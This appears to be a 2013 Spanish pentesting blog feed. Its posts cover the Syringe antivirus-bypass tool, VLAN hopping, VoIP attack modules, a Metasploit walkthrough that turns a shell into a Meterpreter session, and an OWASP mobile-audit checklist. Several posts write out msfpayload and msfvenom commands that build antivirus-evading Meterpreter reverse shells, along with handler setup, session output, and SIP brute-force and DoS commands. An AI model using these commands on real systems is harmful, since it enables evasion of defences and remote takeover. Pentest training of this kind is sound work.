Seguridad para Todos | ST2

[Tool] Syringe Antivirus Bypass usando Meterpreter como Payload

noreply@blogger.com (Julián Gonzalez) — Wed, 08 May 2013 09:55:00 +0000

Hace un tiempo publique una serie de tres artículos sobre las diferentes forma de crear un fichero ejecutable (exe) con capacidad de evasión del sistema Antivirus utilizando el framework de seguridad #Metasploit.

En su momento estuve tentado de crear un script que generase un ejecutable con un PAYLOAD según unas especificaciones previas, y que automáticamente comprobase en Virustotal su eficacia. Ahora, buceando en Internet he ido a parar a http://www.commonexploits.com quién ha creado precisamente un script que realiza exactamente eso, es decir, generar un payload con metasploit con técnicas de evasión de antivirus.

Sin embargo, aunque el script (AV0id) es muy interesante, ese mismo artículo me ha puesto sobre la pista de una herramienta de gran utilidad, cuyo objetivo es evadir (bypass) los sistema antivirus. Es precisamente sobre esto ultimo de lo que voy a hablar a continuación.

¿Qué es syringe?

Durante un test de penetración puede resultar muy útil disponer algún ejecutable con capacidad de "puerta trasera" (backdoor) con el que demostrar la debilidad encontrada tomando el control del equipo objeto del análisis. Es en este punto donde entra en juego el Syringe creado por un investigador de Seguridad independiente llamado Hasan (aka inf0g33k). Hasan publica un documento técnico (PDF) donde explica la técnica que utiliza para cargar la shell, generada con Metasploit, en memoria y demuestra con un ejemplo su funcionamiento.

La herramienta, básicamente carga en memoria un PAYLOAD de tipo meterpreter generado por Metasploit, utilizando técnicas de ENCODING de forma que pueda evadir el sistema Antivirus del sistema. (Asunto que ya se ha tratado en otra ocasión en el blog).

¿Cómo funciona?

Esta herramienta, syringe, utiliza la función VirtualAlloc para reservar una región de la memoria en Windows con permisos de ejecución específicos (read and write). Esta función requiere que el shell code este formado con caracteres alfanuméricos para que puede ser ejecutado.

Para generar el código (shellcode) utiliza el framework Metasploit, luego genera un ejecutable utilizando la herramienta 7z y una serie de bash script, fragmento de código en visual basic script (vbs) simplemente es para oculta el terminal de consola durante la ejecución del bash script. Cómo nota de interes, el autor, en su herramienta syringe introduce el código (shellcode) en un bloque estructurado del tipo SEH (Structured Exception Handler) que será el que habilite la ejecución del código (shellcode) de forma exitosa, a través de la función VirtualAlloc.

Los parámetros utilizado para generar el PAYLOAD son:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LPORT=4444 LHOST=IP_KalinLinux R | msfencode -a x86 -e
x86/alpha_mixed -t raw BufferRegister=EAX

Una vez creado el ejecutable SFX, se debe de iniciar un servidor que gestione las conexiones en el puerto 4444 del shellcode generado, esto se hace tal y como se vio en mi artículo sobre Metasploit, de forma que:

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
EXITFUhread LPORT=4444 LHOST=IP_KaliLinux E

Llegados a este punto, solo es necesario ejecutar el fichero SFX (exe) generado [bash script makeExeFromBat.bat] y tendremos una sesión de meterpreter sobre el equipo de la victima.

Download

Licencia: GNU GPL v3

WEB: https://code.google.com/p/syringe-antivirus-bypass/

Fichero: Syringe_Pack

SHA: b720d32f2ad43defab223d85646ac6b3786f9de7

Referencias:

[1] AV0id Script Bypass AV System

[2] WhitePaper [PDF|EN] Bypassing antivirus with sharp syringe

Via: @teamcymru

[Tools] Network Log: Analizador en tiempo real del registro de conexiones de red (logs) en Android

noreply@blogger.com (Julián Gonzalez) — Tue, 07 May 2013 09:44:00 +0000

¿Qué es Network Log?

Es una aplicación que se encarga de monitorizar en tiempo-real el registros (logs) de las conexiones de datos generado por el módulo iptables en el dispositivo móvil con Android.

La aplicación organiza la información en tablas y gráficos para que sea sencillo analizar la información disponible.

Iptables: se encuentra disponible en el núcleo (kernel) Linux (también en el kernel de Android) que permite interceptar y manipular paquetes de red. Dicho módulo permite realizar el manejo de paquetes en diferentes estados del procesamiento, por ejemplo: realizar funciones de cortafuegos (filtrar), registrar el tráfico de la red, o incluso implementar el servicio de traducción de direcciones (NAT).

Además, la aplicación muestra estadísticas del uso de la conexión a Internet, muy útil para controlar el gasto de datos, sobre todo cuando no se dispone de tarifa plana.

Requisitos

Para utilizar la herramienta se necesita acceso "root" al dispositivo. Por lo que es necesario realizar un jailbreak de nuestro sistema Android.

Donwload:

Puede descargar en Google Play, o acceder al código fuente en : https://github.com/pragma-/networklog.

SecurimaTICa 2013 - Jornadas de #Ciberseguridad en Córdoba

noreply@blogger.com (Julián Gonzalez) — Wed, 24 Apr 2013 14:10:00 +0000

La Diputación de Córdoba, a través del Consorcio Provincial de Desarrollo Económico y en el marco del plan Creática, impulsa “Securimática”, un programa que incluye sesiones informativas, jornadas técnicas y un reto de hacking ético y que trata de contribuir a implantar la cultura de la ciberseguridad entre empresarios y usuarios.

En esta línea, y en colaboración con entidades y empresas especializadas en la seguridad informática se enmarca la celebración de SecurimaTICa´2013. Este programa se compone de una serie de actividades que pretenden contribuir a la implantación de la Cultura de la Ciberseguridad:

8/05/2013. Seminario Ciberseguridad "Doméstica".

9/05/2013. Seminario Ciberseguridad en la Empresa.

08/05/13-14/05/13. Reto Hacking Ético.

15/05/2013. Jornada Técnica I.

16/05/2013. Jornada Técnica II.

16/05/2013. Hack & Beers.

Me complace anunciar que estaré en SecurimaTICa 2013, en las jornadas técnicas del 15 y 16 de Mayo donde impartiré una charla sobre "Seguridad en la Empresa: La amenaza de los smartphones", abordando la tendencia de BYOD (Bring Your Own Device), las amenazas y vulnerabilidades en los dispositivos móviles, así como algunas recomendaciones de seguridad para mitigar los riesgos.

Y por la tarde, toca el taller de Metasploit: Pivoting .... no os lo perdáis! A continuación os dejo el programa, localización, agenda, y cartel de las jornadas. #Cordobasemueve

Programa

Sesiones Informativas

Ciberseguridad en el entorno "doméstico"

Fecha: 8/05/2013
Sala de Usos Múltiples. Diputación
Organiza: Diputación/Eprinsa

17:00-17:15. Apertura de la sesión. Diputación.

17:15-18:00. Seguridad y privacidad en redes sociales. Policía.

18:00-18:45. ¿Nuestra WiFi en segura? Raul Morales / Antonio Osuna (Aconsa).

18:45-19:30. ¿Estás seguro de que estás seguro? Miguel Ángel (Aconsa).

19:30-20:15. Hacer de nuestra afición nuestra profesión. Pedro Reina (Infinito).

20:15-20:30. Cierre de la sesión. Diputación.

Ciberseguridad en la Empresa

Fecha: 9/05/2013
Sala de Usos Múltiples. Diputación
Organiza: Diputación/Eprinsa

17:00-17:15. Apertura de la sesión. Diputación.

17:15-18:00. ¿Cómo actuar ante un ataque? Policía.

18:00-18:45. Aspectos legales en el mundo digital Francisco Ramírez (Avanza).

18:45-19:30. Amenazas y riesgos para nuestra empresa. Miguel Ángel (Aconsa).

19:30-20:15. Comunicación segura con la Administración. Eprinsa.

20:15-20:30. Cierre de la sesión. Diputación.

Jornadas Técnicas

Jornada I

Fecha: 15/05/2013
Diputación
Organiza: Diputación/Eprinsa

9:30-09:45. Presentación Institucional. Diputación.

9:45-10:30. Delitos telemáticos en nuestra sociedad. Policía.

10:30-11:15. Lo esencial y lo crítico, de la gran empresa al usuario. Joaquín González (Grupo Control).

11:45-12:15. Obligaciones legales con la Administración (LOPD). Francisco Ramírez (Avanza).

12:15-13:30. Simulación de Ciberataque. SOC Aconsa.

13:30-13:45. Apertura de la sesión. Diputación.

16:30-16:45. Los nuevos perfiles laborales en el mundo de la seguridad. Mesa redonda (Joaquín González, UCO, Policía...).

16:45-17:30. Inteligencia en Ciberseguridad. Roberto Peña.

17:30-18:15. Seguridad de dispositivos y datos. Checkpoint.

18:15-19:00. Seguridad en la nube. Josep Bardallo (SVT).

19:00-19:45. Cierre de la jornada. Diputación.

Jornada II

Fecha: 16/05/2013
Diputación
Organiza: Diputación/Eprinsa

9:30-09:45. Presentación Institucional. Diputación.

9:45-10:30. Seguridad en la empresa: La amenaza de los smartphones. Julián González (ISDEFE).

10:30-11:15. Virtualización de grandes organizaciones. Pablo Maza (Cajasur).

11:45-12:30. Taller de... Alumnos varios (UCO).

12:30-13:30. Taller de seguridad WiFi. Manuel Camacho (Proxy).

13:30-13:45. Cierre de la jornada. Diputación.

Hack & Beers

Fecha: 16/05/2013
Cosfera
Organiza: Cosfera/Aconsa

17:00-17:15. Presentación. Cosfera.

17:15-18:00. Taller de Metasploit: Pivoting. Julián González (ST2Labs).

18:00-18:45. Enjaulando NGiNX. Mª José Montes (HDMagazine).

18:45-19:30. Descubriendo el terreno de juego. Miguel Ángel (Aconsa).

19:30-20:00. Entrega de premios y resumen reto. Aconsa/Cosfera/Infinito.

20:00... Networking / beers. Cosfera.

¿Donde?

En la sala de usos múltiples 8 y 9 de Mayo 2013, y en el salón de actos palacio de la Merced, los días 15 y 16 de Mayo 2013, de la Diputación Provincial de Córdoba (Andalucía).

Referencias:

Nota de prensa: Diputación Provincial de Córdoba
http://www.programacreatica.es

#Pentesting [Tools] Frogger.sh // VLAN Hopping Script

noreply@blogger.com (Julián Gonzalez) — Thu, 18 Apr 2013 07:00:00 +0000

¿Qué es Frogger?

Es un script creado por commonexploits.com para automatizar el proceso de auditoria de infraestructuras de redes con segmentación mediante VLAN. Este script facilita y automatiza la tarea de descubrimiento de VLAN (enumeration) y la ejecución de diferentes tipo de ataques.

VLAN es un método de crear redes lógicamente independientes dentro de una misma red física [Wikipedia]

Por supuesto, para utilizar este script en una red propiedad de terceros, se debe de contar con la autorización correspondiente, en caso contrario, utilizar este script solamente en vuestra propia infraestructura de red.

¿Cómo funciona?

El script ha sido creado para automatizar el proceso de descubrimiento de la VLAN y su identificador, así como la preparación para realizar un posterior ataque sobre las VLAN de interes. Este proceso se suele realizar de forma manual, utilizando un sniffer, yersinia, arpscan, etc. Con este script puede ahorrarse tiempo al realizar el proceso de forma automática.

Este script, necesita de las herramientas anteriormente mencionadas para poder funcionar, ya que se limita a automatizar el proceso y utilización de las mismas. Por ello, para comprender y saber utilizar adecuadamente este script es fundamental conocer el funcionamiento de todas las herramientas que intervienen.

El script automatiza las siguientes tareas:

Analiza el tráfico de red en busca de paquetes CDP, y extrae la siguiente información (VTP domain name, VLAN management address, Native VLAN ID and IOS version of Cisco devices).

Activación del DTP Trunk attack de forma automática.

Analiza el tráfico de red en busca de paquetes STP para extraer las etiquetas 802.1Q VLAN e identificar sus correspondientes IDs.

Con los IDs VLAN se inicia un descubrimiento de equipos activos en la red con ayuda de arp-scan.

Se creará automáticamente una interfaz de red VLAN para poder conectarse ala VLAN seleccionada.

Según el autor el script ha sido probado con éxito en una distribución BackTrack, en particular la BT5. Se necesita la versión de arp-scan version 1.8 con soporte tagged VLAN ID [2]. << Puedo confirmar que efectivamente el script funciona en BT5, siendo necesario descargar e instalar el arp-scan 1.8 >>

Download ARP-SCAN: http://www.nta-monitor.com/files/arp-scan/arp-scan-1.8.tar.gz

root@ST2Labs~# ./confgure
root@ST2Labs~# make && make install

Y todo listo, ya podéis descargar el script frogger.sh y empezar a jugar!

Download Version 1.4: http://www.commonexploits.com/tools/frogger/frogger.sh

(19/12/12) 1.4 uploaded. 4x faster at CDP scanning, thanks to Bernardo Damele for code improvements. Other improvements made to improve the easy of use.

(18/5/12) 1.2 uploaded, 1.1 was the wrong version I uploaded :/). 1.2 lists VLAN ID’s in a better way.

MD5 Checksum: be20d89fe0c7f49b3dacd818d55628be

Referencias:
[1] Frogger – VLAN Hopping Script
[2] ARPSCAN with tagged VLAN ID support

#Pentester [Cheat Sheet] One-Liner Reverse Shell

noreply@blogger.com (Julián Gonzalez) — Tue, 16 Apr 2013 16:37:00 +0000

Hace un tiempo escribí un artículo con una recopilación de comandos de Unix/Linux listo para ser utilizados en la etapa de "Explotation", es decir, momento en el que se explota con éxito la vulnerabilidad detectada, por ejemplo, inyectando una línea de comando que habilite una terminal remota (Shell inversa) con el que controlar el Sistema vulnerable.

Para celebrar que he superado los 800 seguidores en Twitter, he realizado una recopilación de algunos de los comandos más utilizados y populares en la creación de "Reverse Shells", o lo que es lo mismo, comandos de Linux para generar una conexión desde la victima con una Shell de Linux activa.

Esta recopilación de comandos la he plasmado en una sola hoja a modo de "chuleta" (Cheet Sheet) para que los #Pentester y/o #Ethical Hacker (o cualquier otro profesional de la Seguridad) la tenga a mano durante un test de penetración y/o Auditoria de Seguridad.

A continuación os dejo el enlace para que podáis descargar este PDF:

ST2Labs_Reverse_Shell_OL_Cheat-Sheet-v.1.0.pdf

SHA1: 585396e485223a5de8d8e403ba48a5b6d6e05127

Cheet Sheet based on: pentestmonkey.net & http://bernardodamele.blogspot.com.es/

VIPROY - VoIP Penetration Testing Kit

noreply@blogger.com (Julián Gonzalez) — Thu, 11 Apr 2013 10:51:00 +0000

¿Qué es VIPROY?

Es un servidor SIP (Session Initiation Protocol) basado en Asterisk, configurado y preparado para el entrenamiento de los Pentester, es decir, un servidor vulnerable preparado para trabajar y soportar comunicaciones por VoIP. Esta pensado para conseguir averiguar el password (cracking) y obtener acceso a los buzones de voz.

SIP es el protocolo de señalización que hace posible el establecimiento de las llamadas de voz por Internet, es decir por IP.

Este Kit se ha desarrollado para mejorar las habilidades de los Pentester en los entornos de VoIP, en especial las pruebas de seguridad que se realizan para los procesos de autenticación.

VIPROY permite poner a prueba el sistema de autenticación, proporcionando de este modo un entrenamiento muy interesante para aquellos profesionales (Pentester) que se enfrenten a un test de penetración con infraestructura de VoIP.

Las pruebas o test que se incluyen en el Kit, son:

Options tester: manipulación de las opciones de comunicación en la VoIP, con el protoclo SIP se puede indicar el codec que se utiliza en la comunicación, así como el puerto de conexión. Se puede poner a prueba las opciones.

Brute force: Ataques de fuerza bruta en el proceso de identificación de cada teléfono/ usuario.

Enumerator: Se puede poner en practica la técnica de conseguir información sobre los usaurios y/o terminales de VoIP, que tiene el servidor registrados.

Invite tester: pruebas en el proceso de llamada de los usuarios de VoIP.

Trust analyzer, Proxy/Registration tester: evaluar la seguridad del proceso de registro y la comunicación a través de proxy.

Como se puede apreciar, VIPROY ofrece un entorno ideal para el entrenamiento de los Pentester orientados a las infraestructuras con VoIP.

PREPARANDO EL ESCENARIO

El KIT consiste en un máquina virtual preparada y lista para su funcionamiento; se puede descargar en siguiente enlace:

MD5 Hash of VulnVoIP.7z: 1411bc06403307d5ca2ecae47181972a

VMware: vulnvoip.7z

Las características principales son: x86, VMWare. 512MB RAM, NAT network.

Github: https://github.com/fozavci/viproy-voipkit

Por supuesto, para usar correctamente el entorno, se debe de conocer como estan configurados los diferentes módulos del Servidor Asterisk.

A continuación, copio la información que la página oficial proporciona:

Global Settings

setg CHOST 192.168.1.99 #Local Host
setg CPORT 5099 #Local Port
setg RHOSTS 192.168.1.1-254 #Target Network
setg RHOST 192.168.1.201 #Target Host

Basic Usage of OPTIONS Module

use auxiliary/scanner/sip/vsipoptions
show options
set THREADS 255
run

Basic Usage of REGISTER Module

use auxiliary/scanner/sip/vsipregister
show options
run
set LOGIN true
set USERNAME 101
set PASSWORD s3cur3
run

Basic Usage of INVITE Module

use auxiliary/scanner/sip/vsipinvite
set FROM 2000
set TO 1000
run
set LOGIN true
set FROM 102
set USERNAME 102
set PASSWORD letmein123
run
set DOS_MODE true
set NUMERIC_USERS true
set NUMERIC_MIN 200
set NUMERIC_MAX 205
run

Basic Usage of ENUMERATOR Module

use auxiliary/scanner/sip/vsipenumerator
show options
unset USERNAME
set USER_FILE /tmp/files/users2
set VERBOSE false
set METHOD SUBSCRIBE
run
unset USER_FILE
set METHOD SUBSCRIBE
set NUMERIC_USERS true
set NUMERIC_MAX 2300
run
set METHOD REGISTER
run

Basic Usage of BRUTE FORCE Module

use auxiliary/scanner/sip/vsipbruteforce
show options
set RHOST 192.168.1.201
set USERNAME 2000
set PASS_FILE /tmp/files/passwords
set VERBOSE false
run
unset USERNAME
set USER_FILE /tmp/files/users2
run
unset USER_FILE
set NUMERIC_USERS true
set NUMERIC_MAX 500
run

Basic Usage of Trust Analyzer Module

use auxiliary/scanner/sip/vsiptrust
show options
set SRC_RHOSTS 192.168.1.200-210
set SRC_RPORTS 5060
set SIP_SERVER 192.168.1.201
set INTERFACE eth0
set TO 101
run
show options
set ACTION CALL
set SRC_RHOSTS 192.168.1.202
set FROM James Bond
run

Basic Usage of SIP Proxy Module

use auxiliary/scanner/sip/vsipproxy
show options
set PRXCLT_PORT 5060
set PRXCLT_IP 192.168.1.99
set PRXSRV_PORT 5089
set PRXSRV_IP 192.168.1.99
set CLIENT_IP 192.168.1.120
set CLIENT_PORT 5060
set SERVER_IP 192.168.1.201
set SERVER_PORT 5060
set CONF_FILE /tmp/sipproxy_replace.txt
set LOG true
set VERBOSE false
run

EJEMPLO DE USO: DEMO

A continuación os dejo un vídeo de demostración con #Metasploit SIP Module, donde se puede ver algunos ataques realizados dentro de este entorno vulnerable, por poner un ejemplo: SIP Service Discovery, ejecutando un REGISTER sin credenciales.

Para más información:

[1] Página oficial del proyecto.

[2] Página con pruebas: Testing Kit

Vía: Toolswatch.org

[Metasploit] Convertir una simple SHELL en una sesión de METERPRETER

noreply@blogger.com (Julián Gonzalez) — Wed, 10 Apr 2013 15:00:00 +0000

En el artículo de hoy, voy a realizar los pasos necesarios para convertir una simple shell en una sesión de meterpreter. Esto puede resultar muy util, sobretodo si durante el test de pentración te ves obligado a usar una shell simple por ser un archivo de reducidas dimensiones y tener cierta capacidad de evasión de IDS/IPS/AV.

#ST2Labs

>> Paso 1: Generación de una shell de reducidas dimensiones

Tal y como ya vimos en su momento en mis otros artículos (I, II y III), se procederá a generar un ejecutable EXE con una shell reversa_tcp, utilizando técnicas de evasión de antivirus y reducción de tamaño.

root@ST2Labs:~# msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00\x0d\x0a\x20' -f exe-small LHOST=192.168.2.105 LPORT=80 > /tmp/tcpviewshell.exe

Se obtiene:

tcpviewshell.exe (~ 5K) | En virustotal se obtiene un 17/45 (37%) de detección, donde algunos de los principales sistemas antivirus no lo detectan, ver informe utilizando el siguiente SHA256: 4684f19fa27ae5d7baf86aabf854ba61d29c444b627eb08305afcedc01a906ca

>> Paso 2: Configurando Metasploit para gestionar la conexión inversa en el puerto 80

Para ello utilizaremos el comando msfconsole, tal como sigue a continuación:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set LHOST 192.168.2.105
LHOST => 192.168.2.105
msf exploit(handler) > set EnableContextEncoding true

msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.105:80
[*] Starting the payload handler...

>> Paso 3: Ejecutando el archivo tcpviewshell.exe en Windows XP SP3

Se obtiene el siguiente resultado:

>> Paso 4: Convirtiendo una shell simple en una sesión de Meterpreter

Ahora, realizamos el upgrading de la shell win32 a meterpreter session | Lo que realmente se realiza es subir un archivo al equipo remoto utilizando el comando echo.

Para realizar el updating se ejecuta el comando session -u [Id_session_shell]

msf exploit(handler) > sessions -u 1

[*] Started reverse handler on 192.168.2.105:80
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.2.137
msf exploit(handler) > sess[*] Meterpreter session 2 opened (192.168.2.105:80 -> 192.168.2.137:1107) at 2013-03-22 18:03:07 +0100
ions

Finalmente se obtiene una segunda sesión remota con una interfaz meterpreter, véase la imagen siguiente:

Updating win32 shell to meterpreter.

ST2Labs
#Pentesting Rulez!

OWASP: METODOLOGÍA PARA ANÁLISIS DE SEGURIDAD EN APLICACIONES MÓVILES (III)

noreply@blogger.com (Julián Gonzalez) — Mon, 08 Apr 2013 11:15:00 +0000

En la primera y segunda parte se ha realizado un análisis de la información (gathering) con el objetivo de disponer de una completa visión sobre la aplicación (alcance y magnitud). En este artículo se van a describir los pasos para realizar una completa revisión del código fuente de la aplicación, es lo que se conoce como Análisis Estático.

INDICE:

- OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (I)
- OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (II)
- OWASP: Metodología para análisis de Seguridad en Aplicaciones Móviles (III)

E2: Static Analysis

En esta etapa se llevará a cabo una revisión del código fuente de la aplicación, esto puede realizarse de dos formas diferentes:

1 . Obteniendo el código fuente disponible y proporcionado por el equipo de desarrollo de la aplicación. En caso de ser una aplicación open-source, se accedería a su repositorio público.

2. Utilizando ingeniería inversa, de forma que se obtiene el código de la aplicación utilizando de-compiladores y herramientas de manipulación a bajo nivel.

Desde el punto de la seguridad los mejores resultados de una auditoria de aplicaciones se suceden cuando se tiene pleno acceso al código fuente de la aplicación, y se dispone de un entorno de pruebas para la ocasión.

A continuación, se detallan las actividades y tareas en las que se divide una Auditoria de código para aplicaciones móviles.

E2.A1: Requisitos necesarios para la Auditoria de Código

E2.A1.T1 Obtener el código fuente de la aplicación a auditar.

E2.A1.T2 Revisión e identificación de los permisos requeridos por la aplicación (AndroidManifest.xml, iOS Entitlements).

E2.A1.T3 Revisión de las configuración de la aplicación en busca de estados incompletos o errores, configuración insegura, etc.

E2.A1.T4 Identificación y listado de las librerías de terceros utilizadas por la aplicación móvil.

E2.A1.T5 Comprobar si el dispositivo Android es posible obtener acceso root / jailbreak, si es así, buscar información sobre como es posible realizar con éxito el proceso.

E2.A1.T6 Revisar e identificar las librerías dinámicas que son cargadas por la aplicación para su funcionamiento.

E2.A1.T7 Identificar los permisos que la aplicación solicita para su funcionamiento, y comprobar que dichos permisos son realmente necesarios para su correcto funcionamiento, algunas aplicaciones requieren más permisos de los que realmente necesita.

E2.A1.T8 Identificar los puntos de entrada de información, y comprobar los controles de seguridad aplicados, Ejemplos:

> Recepción de datos de otras aplicaciones | sanitización de input / output data
> Recepción de SMS
> Lectura de datos de una WEB
> Lectura de datos de un fichero almacenado en la tarjeta SD.

E2.A2: Revisión del proceso de Autenticación

E2.A2.T1 Identificar las líneas de código que se encargan de manejar la autenticación de los usuarios a través de la interfaz gráfica.

E2.A2.T2 Analizar y evaluar el posible uso de técnicas de ataques de fuerza bruta para la obtención del acceso.

E2.A2.T3 Identificar y determinar que otros métodos, aparte del user / password, utiliza la aplicación:

> Token
> Información contextual (localización, IMEI, etc)
> Certificados
> Gestión de las sesiones de usuario (intercambios de información de forma segura, etc)

E2.A2.T4 En caso, de detectar la utilización de métodos visuales como método de contraseña, se deberá revisar el método de mapeado utilizado con objeto de verificar que se utiliza con un adecuado nivel de entropia.

E2.A2.T5 En caso, de que la aplicación se comunique con otras aplicaciones, se por el medio que sea (WiFi Direct, Android Beam, NFC, etc), se deberá revisar la gestión adecuada de la autenticación remota de los usuarios, prestando especial interés en la gestión de los errores de autenticación (fail logon).

E2.A2.T6 En caso de utilizar el método Single Sign On, identificar que método esta utilizando (librerias,etc)

E2.A2.T7 Si se utiliza los SMS para la autenticación, comprobar que no se transmite información sensible comprometedora, utilización de OTP (Password de una sola vez), ¿Que otras aplicaciones tiene acceso a dichos datos?

E2.A2.T8 En caso de utilizar las notificaciones Push ¿Como gestionar la aplicación la verificación de la identidad del servidor de los datos?

E2.A3: Revisión de los niveles de Autorización de la aplicación

E2.A3.T1 Identificar y revisar los permisos que se aplican sobre los ficheros creados durante la ejecución de la aplicación.

E2.A3.T2 Verificar que la aplicación no tiene acceso a otras funcionalidades fuera de los establecido en su rol.

E2.A3.T3 Identificar y localizar puntos potenciales de escalada de privilegios como son:

> Bases de datos
> Fichero en texto plano
> HTTP

E2.A3.T4 Identificar puntos conflictivos del código fuente de la aplicación que pueden saltarse el flujo normal de funcionamiento de la misma. Ejemplo: Puntos de excepción.

E2.A3.T5 En caso, de tratarse de una aplicación con licencia, se debe examinar con detalle el método y el procedimiento de gestión de la misma: resgitro, activación, modificación, expiración, etc.

E2.A4: Revisión de los métodos de almacenamiento de Información

E2.A4.T1 Cifrado de la Información

> Identificación de los algoritmo de cifrado utilizados.
> Examinar el método de gestión de la claves de cifrado.
> Identificar los puntos débiles de dicho método de cifrado.

E2.A4.T2 Identificación y localización de los puntos donde la aplicación almacena cualquier tipo de información (tmp, SD, etc..), incluidos los servicios de backup en la nube (Dropbox, Google Drive, etc)

E2.A4.T3 Analizar el tipo de información expuesta a API de terceros, como por ejemplo: el acceso a los contactos.

E2.A5: Gestión de las comunicaciones Seguras

E2.A5.T1 Identificación y análisis de uso de los métodos de conexión accesibles por la aplicación (WiFi, 3G, etc)

E2.A5.T2 Análisis de la gestión de la conexión segura de la aplicación al pasar de un medio de comunicación a otro. Ej: pasar de estar conectado con WiFi a 3G, o incluso utilización mixta.

E2.A5.T3 Identificación y verificación de los certificados utilizados por la aplicación.

E2.A5.T4 Análisis de los certificados: caducidad, autoridad de certificación, válidez, revocación, seguridad, etc.

E2.A6: Información Sensible Accesible (Information Disclosure)

E2.A6.T1 Identificación de los puntos de exposición de información. Ejemplo: logs, cache, archivos de configuración, etc.

E2.A6.T2 Análisis de los puntos de exposición de información (PEI) para identificar posibles fugas de información sensible.

E2.A6.T3 Verificación de los PEI en los mensajes de error de la aplicación. Asegurarse que estos mensajes son correctamente gestionados impidiendo que se muestre información considerada sensible.

E2.A6.T4 Identificar y evaluar la información accesible e intercambiada por las librerías (API) de terceros.

Por ultimo si la aplicación (Apps) es una versión WEB para móviles, se deberán de tener en consideración las vulnerabilidades WEB, es decir, Analizar la aplicación en busca de:

> XSS y HTML Injection.
> Command Injection (si la aplicación utiliza una shell para desarrollar parte de sus tareas)
> SQL Injection (si utiliza base de datos, o se comunica con alguna)
> Gestión de sesiones (Cookies)
> Proceso de Autenticación
> Seguridad en HTML5

En todo análisis estático es muy útil realizar búsqueda en el código de cadenas de caracteres y expresiones regulares, ya que estas podrían estar relacionadas con puntos de entrada / salida de Datos.

Con esto finalizaría el Análisis estático de la aplicación móvil, pasando a continuación a evaluar y analizar la seguridad de la aplicación en funcionamiento, es lo que se conoce Análisis Dinámico.

Pero esto, daría para hablar de ello en otra serie de artículos. Espero que os haya gustado, si es así no olvidéis compartirlo por la redes sociales.

Gracias,
un Saludo.

REFERENCIAS

[1] OWASP: Security Testing Guide

[2] OWASP: Top Ten Mobile Risks

[3] OWASP: Mobile Security Proyects

Metasploit: de ENCODING y PAYLOAD va la cosa (III)

noreply@blogger.com (Julián Gonzalez) — Sat, 23 Mar 2013 17:54:00 +0000

En la primera parte se hizo una introducción a los comandos de #Metasploit para la creación y manipulación de los PAYLOAD, realizando un ejemplo de utilización, en particular con el comando msfpayload.

